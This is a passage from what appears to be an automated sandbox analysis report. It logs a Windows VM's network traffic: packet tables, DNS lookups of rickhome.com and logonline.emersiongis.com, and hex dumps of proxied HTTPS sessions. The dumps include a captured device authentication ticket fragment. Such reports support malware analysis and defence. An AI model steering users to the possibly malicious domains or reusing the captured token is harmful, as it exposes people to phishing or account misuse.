Jul 15, 2024 07:54:05.440357924 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:05.440388918 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:05.440680981 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:05.444684982 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:05.444843054 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:05.444859982 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:05.445148945 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:05.492500067 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:05.621608019 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:05.621820927 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:05.621910095 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:05.622301102 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:05.622318029 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:14.036302090 CEST	49735	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:14.036339045 CEST	443	49735	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:14.036448956 CEST	49735	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:14.041230917 CEST	49735	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:14.041243076 CEST	443	49735	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:14.842596054 CEST	443	49735	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:14.843029976 CEST	49735	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:14.846987963 CEST	49735	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:14.847008944 CEST	443	49735	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:14.847358942 CEST	443	49735	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:14.848954916 CEST	49735	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:14.848954916 CEST	49735	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:14.848977089 CEST	443	49735	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:14.849298000 CEST	49735	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:14.892505884 CEST	443	49735	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:15.022800922 CEST	443	49735	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:15.022893906 CEST	443	49735	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:15.023308992 CEST	49735	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:15.023309946 CEST	49735	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:15.333841085 CEST	49735	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:15.333880901 CEST	443	49735	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:22.880624056 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:22.880667925 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:22.880837917 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:22.882242918 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:22.882257938 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:23.685877085 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:23.685976982 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:23.688899994 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:23.688911915 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:23.689209938 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:23.693691969 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:23.693949938 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:23.693954945 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:23.694418907 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:23.740516901 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:23.863440037 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:23.863657951 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:23.863744974 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:23.885124922 CEST	49736	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:23.885157108 CEST	443	49736	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:33.765779018 CEST	49722	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:54:33.765795946 CEST	443	49722	139.28.37.144	192.168.2.6
Jul 15, 2024 07:54:37.879893064 CEST	49738	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:37.880001068 CEST	443	49738	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:37.880106926 CEST	49738	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:37.880989075 CEST	49738	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:37.881026983 CEST	443	49738	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:38.675546885 CEST	443	49738	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:38.675796032 CEST	49738	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:38.677582026 CEST	49738	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:38.677613974 CEST	443	49738	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:38.677891970 CEST	443	49738	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:38.679533005 CEST	49738	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:38.679588079 CEST	49738	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:38.679600954 CEST	443	49738	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:38.679708004 CEST	49738	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:38.720519066 CEST	443	49738	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:38.851506948 CEST	443	49738	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:38.851598978 CEST	443	49738	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:38.852082968 CEST	49738	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:38.852082968 CEST	49738	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:38.852185965 CEST	443	49738	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:38.852230072 CEST	49738	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:45.384854078 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:45.384915113 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:45.385066032 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:45.385842085 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:45.385863066 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:46.168957949 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:46.169063091 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:46.170955896 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:46.170988083 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:46.171288013 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:46.174921989 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:46.174921989 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:46.174921989 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:46.174969912 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:46.216509104 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:46.345196009 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:46.345330000 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:46.345454931 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:46.345582008 CEST	49740	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:46.345623016 CEST	443	49740	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:48.199726105 CEST	49741	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:54:48.199770927 CEST	443	49741	142.250.186.36	192.168.2.6
Jul 15, 2024 07:54:48.199923038 CEST	49741	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:54:48.203840971 CEST	49741	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:54:48.203860044 CEST	443	49741	142.250.186.36	192.168.2.6
Jul 15, 2024 07:54:48.526002884 CEST	443	49722	139.28.37.144	192.168.2.6
Jul 15, 2024 07:54:48.526125908 CEST	443	49722	139.28.37.144	192.168.2.6
Jul 15, 2024 07:54:48.526257992 CEST	49722	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:54:48.832988024 CEST	443	49741	142.250.186.36	192.168.2.6
Jul 15, 2024 07:54:48.833395004 CEST	49741	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:54:48.833436966 CEST	443	49741	142.250.186.36	192.168.2.6
Jul 15, 2024 07:54:48.833789110 CEST	443	49741	142.250.186.36	192.168.2.6
Jul 15, 2024 07:54:48.834141016 CEST	49741	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:54:48.834218979 CEST	443	49741	142.250.186.36	192.168.2.6
Jul 15, 2024 07:54:48.874660969 CEST	49741	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:54:50.489726067 CEST	49722	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:54:50.489753008 CEST	443	49722	139.28.37.144	192.168.2.6
Jul 15, 2024 07:54:58.740451097 CEST	443	49741	142.250.186.36	192.168.2.6
Jul 15, 2024 07:54:58.740533113 CEST	443	49741	142.250.186.36	192.168.2.6
Jul 15, 2024 07:54:58.740668058 CEST	49741	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:55:00.472387075 CEST	49741	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:55:00.472414970 CEST	443	49741	142.250.186.36	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 15, 2024 07:53:44.079858065 CEST	53	49807	1.1.1.1	192.168.2.6
Jul 15, 2024 07:53:44.121679068 CEST	53	65434	1.1.1.1	192.168.2.6
Jul 15, 2024 07:53:45.120249033 CEST	53	55116	1.1.1.1	192.168.2.6
Jul 15, 2024 07:53:45.425842047 CEST	62632	53	192.168.2.6	1.1.1.1
Jul 15, 2024 07:53:45.426012039 CEST	50038	53	192.168.2.6	1.1.1.1
Jul 15, 2024 07:53:45.631711006 CEST	53	62632	1.1.1.1	192.168.2.6
Jul 15, 2024 07:53:45.799007893 CEST	53	50038	1.1.1.1	192.168.2.6
Jul 15, 2024 07:53:47.645014048 CEST	62753	53	192.168.2.6	1.1.1.1
Jul 15, 2024 07:53:47.645291090 CEST	51736	53	192.168.2.6	1.1.1.1
Jul 15, 2024 07:53:47.688751936 CEST	53	62753	1.1.1.1	192.168.2.6
Jul 15, 2024 07:53:47.714451075 CEST	53	51736	1.1.1.1	192.168.2.6
Jul 15, 2024 07:53:48.157814980 CEST	52631	53	192.168.2.6	1.1.1.1
Jul 15, 2024 07:53:48.158489943 CEST	54993	53	192.168.2.6	1.1.1.1
Jul 15, 2024 07:53:48.170597076 CEST	53	52631	1.1.1.1	192.168.2.6
Jul 15, 2024 07:53:48.170619011 CEST	53	54993	1.1.1.1	192.168.2.6
Jul 15, 2024 07:54:02.383049965 CEST	53	62244	1.1.1.1	192.168.2.6
Jul 15, 2024 07:54:21.124119043 CEST	53	63850	1.1.1.1	192.168.2.6
Jul 15, 2024 07:54:43.410799980 CEST	53	51626	1.1.1.1	192.168.2.6
Jul 15, 2024 07:54:43.937663078 CEST	53	51544	1.1.1.1	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jul 15, 2024 07:53:45.799067974 CEST	192.168.2.6	1.1.1.1	c22d	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 15, 2024 07:53:45.425842047 CEST	192.168.2.6	1.1.1.1	0xfe21	Standard query (0)	rickhome.com	A (IP address)	IN (0x0001)	false
Jul 15, 2024 07:53:45.426012039 CEST	192.168.2.6	1.1.1.1	0x7741	Standard query (0)	rickhome.com	65	IN (0x0001)	false
Jul 15, 2024 07:53:47.645014048 CEST	192.168.2.6	1.1.1.1	0x2357	Standard query (0)	logonline.emersiongis.com	A (IP address)	IN (0x0001)	false
Jul 15, 2024 07:53:47.645291090 CEST	192.168.2.6	1.1.1.1	0x78cf	Standard query (0)	logonline.emersiongis.com	65	IN (0x0001)	false
Jul 15, 2024 07:53:48.157814980 CEST	192.168.2.6	1.1.1.1	0x29b7	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 15, 2024 07:53:48.158489943 CEST	192.168.2.6	1.1.1.1	0xb84c	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 15, 2024 07:53:45.631711006 CEST	1.1.1.1	192.168.2.6	0xfe21	No error (0)	rickhome.com		5.172.176.24	A (IP address)	IN (0x0001)	false
Jul 15, 2024 07:53:47.688751936 CEST	1.1.1.1	192.168.2.6	0x2357	No error (0)	logonline.emersiongis.com		139.28.37.144	A (IP address)	IN (0x0001)	false
Jul 15, 2024 07:53:48.170597076 CEST	1.1.1.1	192.168.2.6	0x29b7	No error (0)	www.google.com		142.250.186.36	A (IP address)	IN (0x0001)	false
Jul 15, 2024 07:53:48.170619011 CEST	1.1.1.1	192.168.2.6	0xb84c	No error (0)	www.google.com			65	IN (0x0001)	false
Jul 15, 2024 07:53:58.195863962 CEST	1.1.1.1	192.168.2.6	0x2c90	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 15, 2024 07:53:58.195863962 CEST	1.1.1.1	192.168.2.6	0x2c90	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jul 15, 2024 07:54:17.658674955 CEST	1.1.1.1	192.168.2.6	0x27c7	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 15, 2024 07:54:17.658674955 CEST	1.1.1.1	192.168.2.6	0x27c7	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 15, 2024 07:54:36.197467089 CEST	1.1.1.1	192.168.2.6	0x63bb	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 15, 2024 07:54:36.197467089 CEST	1.1.1.1	192.168.2.6	0x63bb	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 15, 2024 07:54:56.556220055 CEST	1.1.1.1	192.168.2.6	0x8845	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 15, 2024 07:54:56.556220055 CEST	1.1.1.1	192.168.2.6	0x8845	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 15, 2024 07:54:59.390423059 CEST	1.1.1.1	192.168.2.6	0xcb87	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 15, 2024 07:54:59.390423059 CEST	1.1.1.1	192.168.2.6	0xcb87	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

rickhome.com

https:

logonline.emersiongis.com

fs.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49709	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:53:33 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 61 71 68 77 42 49 44 57 41 6b 47 51 49 34 55 74 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 65 34 31 31 37 62 33 32 36 39 31 37 38 62 35 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: aqhwBIDWAkGQI4Ut.1Context: ce4117b3269178b5
2024-07-15 05:53:33 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-15 05:53:33 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 61 71 68 77 42 49 44 57 41 6b 47 51 49 34 55 74 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 65 34 31 31 37 62 33 32 36 39 31 37 38 62 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 55 51 45 69 4f 64 53 64 36 74 58 75 4f 53 32 42 43 37 65 2f 33 48 39 6e 63 69 32 48 6e 5a 4b 72 72 67 46 62 30 61 72 4d 46 57 34 34 64 46 79 4c 2f 6a 45 7a 54 70 72 67 76 2f 63 69 42 32 59 43 58 36 47 4f 48 2b 31 7a 35 7a 4e 45 75 4f 4a 76 5a 6f 64 67 42 52 62 67 71 42 6d 6e 30 57 56 5a 57 67 64 49 30 4e 33 6a 41 50 53 69 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: aqhwBIDWAkGQI4Ut.2Context: ce4117b3269178b5<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATUQEiOdSd6tXuOS2BC7e/3H9nci2HnZKrrgFb0arMFW44dFyL/jEzTprgv/ciB2YCX6GOH+1z5zNEuOJvZodgBRbgqBmn0WVZWgdI0N3jAPSi
2024-07-15 05:53:33 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 61 71 68 77 42 49 44 57 41 6b 47 51 49 34 55 74 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 65 34 31 31 37 62 33 32 36 39 31 37 38 62 35 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: aqhwBIDWAkGQI4Ut.3Context: ce4117b3269178b5
2024-07-15 05:53:33 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-15 05:53:33 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 62 78 62 61 54 58 41 39 66 6b 53 4f 30 6e 61 74 52 74 43 48 79 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: bxbaTXA9fkSO0natRtCHyA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49710	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:53:39 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 33 38 41 64 4a 34 7a 49 66 30 69 2f 33 7a 78 5a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 63 36 63 64 66 32 64 34 66 32 65 35 32 61 33 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 38AdJ4zIf0i/3zxZ.1Context: 7c6cdf2d4f2e52a3
2024-07-15 05:53:39 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-15 05:53:39 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 33 38 41 64 4a 34 7a 49 66 30 69 2f 33 7a 78 5a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 63 36 63 64 66 32 64 34 66 32 65 35 32 61 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 55 51 45 69 4f 64 53 64 36 74 58 75 4f 53 32 42 43 37 65 2f 33 48 39 6e 63 69 32 48 6e 5a 4b 72 72 67 46 62 30 61 72 4d 46 57 34 34 64 46 79 4c 2f 6a 45 7a 54 70 72 67 76 2f 63 69 42 32 59 43 58 36 47 4f 48 2b 31 7a 35 7a 4e 45 75 4f 4a 76 5a 6f 64 67 42 52 62 67 71 42 6d 6e 30 57 56 5a 57 67 64 49 30 4e 33 6a 41 50 53 69 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 38AdJ4zIf0i/3zxZ.2Context: 7c6cdf2d4f2e52a3<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATUQEiOdSd6tXuOS2BC7e/3H9nci2HnZKrrgFb0arMFW44dFyL/jEzTprgv/ciB2YCX6GOH+1z5zNEuOJvZodgBRbgqBmn0WVZWgdI0N3jAPSi
2024-07-15 05:53:39 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 33 38 41 64 4a 34 7a 49 66 30 69 2f 33 7a 78 5a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 63 36 63 64 66 32 64 34 66 32 65 35 32 61 33 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: 38AdJ4zIf0i/3zxZ.3Context: 7c6cdf2d4f2e52a3
2024-07-15 05:53:39 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-15 05:53:39 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 77 39 6e 7a 47 39 33 51 73 55 6d 51 37 4b 35 43 32 79 58 77 32 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: w9nzG93QsUmQ7K5C2yXw2g.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.6	49712	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:53:44 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 41 45 73 32 6b 32 33 30 67 6b 47 64 66 71 6e 56 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 32 38 61 62 37 64 65 63 30 61 39 63 61 30 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: AEs2k230gkGdfqnV.1Context: 5728ab7dec0a9ca0
2024-07-15 05:53:44 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-15 05:53:44 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 41 45 73 32 6b 32 33 30 67 6b 47 64 66 71 6e 56 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 32 38 61 62 37 64 65 63 30 61 39 63 61 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 55 51 45 69 4f 64 53 64 36 74 58 75 4f 53 32 42 43 37 65 2f 33 48 39 6e 63 69 32 48 6e 5a 4b 72 72 67 46 62 30 61 72 4d 46 57 34 34 64 46 79 4c 2f 6a 45 7a 54 70 72 67 76 2f 63 69 42 32 59 43 58 36 47 4f 48 2b 31 7a 35 7a 4e 45 75 4f 4a 76 5a 6f 64 67 42 52 62 67 71 42 6d 6e 30 57 56 5a 57 67 64 49 30 4e 33 6a 41 50 53 69 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: AEs2k230gkGdfqnV.2Context: 